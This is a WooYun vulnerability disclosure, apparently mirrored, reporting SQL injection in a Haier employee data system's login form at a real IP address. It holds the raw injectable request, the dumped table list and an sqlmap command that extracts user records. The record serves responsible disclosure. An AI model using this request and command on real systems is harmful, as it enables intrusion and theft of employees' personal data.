乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-16: 细节已通知厂商并且等待厂商处理中 2016-05-17: 厂商已经确认,细节仅向厂商公开 2016-05-27: 细节向核心白帽子及相关领域专家公开 2016-06-06: 细节向普通白帽子公开 2016-06-16: 细节向实习白帽子公开 2016-07-01: 细节向公众公开
海尔集团某系统SQL注入(泄露十万员工信息/姓名/工号/手机/部门/内部邮箱)
海尔信息平台(信息到人数据可视化系统)http://27.223.99.106:3000/login/log?next=%2F
uname存在SQL注入
POST /login/log?next=%2F HTTP/1.1Host: 27.223.99.106:3000User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://27.223.99.106:3000/login/log?next=%2FCookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229fba818f4569021e9902e3817561aee7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A46.0%29+Gecko%2F20100101+Firefox%2F46.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463375397%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dad271c28f09793bbbe4559883da794a536f88de6; PHPSESSID=sqn7nb2oupcg98ecu46q2vvad0Connection: keep-aliveuname=admin&password=123456&commit=%E7%99%BB%E5%BD%95
4个库
表
+--------------------------------+| ODSXWPT_V_HRIT_XWPT_INFO || Sheet1 || USER_INFO || VDATA_CST_HR_EMP_BASE || a1 || a2 || a3 || a4 || db1 || db2 || t_idm_user || temp_userxw || vdata_alarm || vdata_alarm_log || vdata_alarm_max_time || vdata_alarm_msg || vdata_alarm_options || vdata_alarm_org || vdata_alarm_role || vdata_alarm_temp || vdata_alarm_template || vdata_alarm_value || vdata_brand || vdata_channel || vdata_child_industry || vdata_collection || vdata_dashboard_action || vdata_dashboard_group || vdata_dashboardgroup_post || vdata_dashborad || vdata_dashborad_0514 || vdata_dashbord_0515 || vdata_datachart_new || vdata_datachart_new_0514 || vdata_datasource || vdata_datasource_auth || vdata_datasource_bak_0330 || vdata_datasource_config || vdata_datasource_folder || vdata_datasource_user || vdata_dimensions || vdata_dimensions_column || vdata_grid_info || vdata_grid_org || vdata_index || vdata_index_count || vdata_industry || vdata_kpi_displaydef || vdata_log || vdata_micro_member || vdata_mirror_dashboard_group || vdata_mirror_dashboard_org || vdata_mirror_dashboard_role || vdata_mirror_dashborad_chart || vdata_monitors || vdata_new_log_all || vdata_new_log_all_m || vdata_new_log_all_month || vdata_new_log_all_month_m || vdata_new_log_class || vdata_new_log_day || vdata_new_log_dg_view || vdata_new_log_master_day || vdata_new_log_master_month || vdata_new_log_month || vdata_new_log_org_day || vdata_new_log_org_month || vdata_new_log_time_day || vdata_new_log_time_month || vdata_new_log_totle || vdata_new_log_wgxw || vdata_new_org_day_rate || vdata_new_org_month_rate || vdata_org || vdata_org_class || vdata_org_class_disConfig || vdata_org_class_disConfig_back || vdata_org_copy || vdata_org_dg || vdata_org_dic || vdata_org_index || vdata_org_moblie_menu || vdata_org_relation || vdata_org_user || vdata_personal_folder || vdata_platform || vdata_post || vdata_recent_view || vdata_role || vdata_role_org || vdata_role_org_folder || vdata_role_topic || vdata_search_history || vdata_small_v_platform || vdata_sys_enum || vdata_sys_folder || vdata_time_dic_bak2 || vdata_time_haier_dic || vdata_tools_role_org || vdata_user || vdata_user_brand || vdata_user_channel || vdata_user_industry || vdata_user_org || vdata_user_post || vdata_user_role || vdata_v_alarm || vdata_v_dashboard_group || vdata_v_dashboard_group_mirror || vdata_v_dashboard_personal || vdata_v_index || vdata_v_org_wg || vdata_v_platform || vdata_v_role_org_folder || vdata_v_user || vdata_v_user_dept_info || vdata_v_user_org || vdata_v_xw_index |+--------------------------------+
十万记录
提取了三十个样本。(漏洞提交完已删除)
sqlmap.py -r 1.txt -D "vdata" -T "vdata_user" --dump --start 10030 --stop 10060
(漏洞提交完已删除所有数据)
修复
危害等级:高
漏洞Rank:12
确认时间:2016-05-17 09:39
感谢白帽子的测试与提醒,已安排人员进行处理
暂无